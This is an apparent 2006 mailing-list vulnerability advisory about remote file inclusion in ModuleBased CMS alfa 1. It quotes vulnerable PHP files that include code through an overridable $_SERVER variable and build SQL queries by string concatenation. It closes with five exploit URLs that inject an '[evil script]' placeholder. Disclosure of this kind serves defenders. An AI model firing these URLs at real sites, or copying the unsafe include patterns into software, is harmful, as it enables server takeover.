ModuleBased CMS alfa 1 Multiple Remote File Inclusion

Thu, 31 Aug 2006 14:55:01 -0700 

+ModuleBased CMS(MBCMS) multiple remote file Inclusion

+discripton:MBCMS (ModuleBased CMS) is a new CMS designed for ease of use and 
customability. It is designed +for PHP/MySQL and it is easy to write new 
modules or templates to suit a particular website. 

+version:alfa 1

+vendor site:http://sourceforge.net/projects/mbcms/

+

+discovered by: ScorpinO

+location:IRAN/ANZALI

+sites: WwW.ScorpinO.NeT         Www.deltahacking.iR

+email:[EMAIL PROTECTED]

+special tnx to:Dr.trojan,HIV++,D_7J,Vampire,......

+

+discovered in avatar.php  archive.class.php  login.php  profile.class.php   
process.php

+

+

/admin/avatar.php


<?php

include_once($_SERVER[DOCUMENT_ROOT]."/libs/profile.class.php");

include($_SERVER[DOCUMENT_ROOT]."/libs/config.php");

$profile = new Profile();

$q = mysql_query("SELECT avatar FROM users WHERE 
username='".$_SESSION['username']."'");

$r = mysql_fetch_assoc($q);


?>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


/libs/archive.class.php


<?php 

include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php");

class Archive{

        function AllArchives(){

                $q = mysql_query("SELECT * FROM posts") or die (mysql_error());

                while ($r = mysql_fetch_assoc($q)){

                        if($r['topic'] == 1)

                                $topic = "News";

                        if($r['topic'] == 2)

                                $topic = "Articles";

                        echo $topic;

                        $q = mysql_query("SELECT * FROM posts WHERE 
topic='".$r['topic']."'") or die (mysql_error());

                        while($r_posts = mysql_fetch_assoc($q))

                                echo $r_posts['post'];

                }

        }

}

?>              


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

/libs/login.php


<?php

        if($_POST['login']){

        include_once($_SERVER[DOCUMENT_ROOT]."/libs/user.class.php");

        $user = new User();

        $user->login($_POST['username'], $_POST['pass']);

        }

?>


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

/libs/profiles.class.php


<?php

include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php"); ?>


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

/libs/profile/proccess.php


<?php

include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php");

?>


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+exploit:

+

+http://www.example.com/[mbcms]/admin/avatar.php?_SERVER=[evil script]

+http://www.example.com/[mbcms]/libs/archive.class.php?_SERVER=[evil script]

+http://www.example.com/[mbcms]/libs/login.php?_SERVER=[evil script]

+http://www.example.com/[mbcms]/libs/profile.class.php?_SERVER=[evil script]

+http://www.example.com/[mbcms]/libs/profile/process.php?_SERVER=[evil script]


++

Reply via email to